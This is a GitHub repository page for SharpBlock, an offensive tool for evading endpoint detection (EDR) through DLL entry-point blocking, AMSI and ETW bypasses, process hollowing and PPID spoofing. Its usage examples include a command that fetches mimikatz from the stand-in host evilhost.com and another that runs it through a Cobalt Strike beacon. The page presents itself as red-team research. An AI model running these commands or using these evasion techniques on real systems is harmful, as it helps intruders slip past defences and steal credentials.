Skip to content
/SharpBlockPublic

A method of bypassing EDR's active projection DLL's by preventing entry point exection

1.2k stars 165 forks BranchesTagsActivity
Star
Notifications You must be signed in to change notification settings

CCob/SharpBlock

BranchesTags

Repository files navigation

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
SharpBlock by @_EthicalChaos_ DLL Blocking app for child processes x64 -e, --exe=VALUE Program to execute (default cmd.exe) -a, --args=VALUE Arguments for program (default null) -n, --name=VALUE Name of DLL to block -c, --copyright=VALUE Copyright string to block -p, --product=VALUE Product string to block -d, --description=VALUE Description string to block -s, --spawn=VALUE Host process to spawn for swapping with the target exe -ppid=VALUE Parent process ID for spawned child (PPID Spoofing) -w, --show Show the lauched process window instead of the default hide --disable-bypass-amsi Disable AMSI bypassAmsi --disable-bypass-cmdline Disable command line bypass --disable-bypass-etw Disable ETW bypass --disable-header-patch Disable process hollow detection bypass -h, --help Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts:

About

A method of bypassing EDR's active projection DLL's by preventing entry point exection

Resources

Readme
Activity

Stars

1.2k stars

Watchers

18 watching

Forks

165 forks
Report repository

Releases

No releases published

Sponsor this project

 
Learn more about GitHub Sponsors

Packages

No packages published

Languages